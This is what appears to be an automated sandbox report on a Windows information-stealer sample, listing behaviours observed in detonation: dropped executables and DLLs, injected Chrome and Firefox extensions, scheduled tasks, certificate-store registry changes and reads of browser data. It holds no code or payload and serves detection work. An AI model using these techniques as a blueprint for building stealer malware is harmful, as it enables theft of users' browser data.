Malware Analysis Report

2025-06-15 19:50

Sample ID 240406-fm56dabh88
Target 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184
SHA256 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184
Tags
discovery spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184

Threat Level: Likely malicious

The file 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184 was found to be: Likely malicious.

Malicious Activity Summary

discovery spyware stealer

Blocklisted process makes network request

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Drops Chrome extension

Drops desktop.ini file(s)

Drops file in System32 directory

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Creates scheduled task(s)

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-06 05:00

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-06 05:00

Reported

2024-04-06 05:03

Platform

win10v2004-20240226-en

Max time kernel

125s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\KEmXDcEBYdtZj.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\EXcBdZ.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\vQDomDF.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\VDiAXGzPiWUn\XlrWwuo.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\VGwavyx.dll C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
File created C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
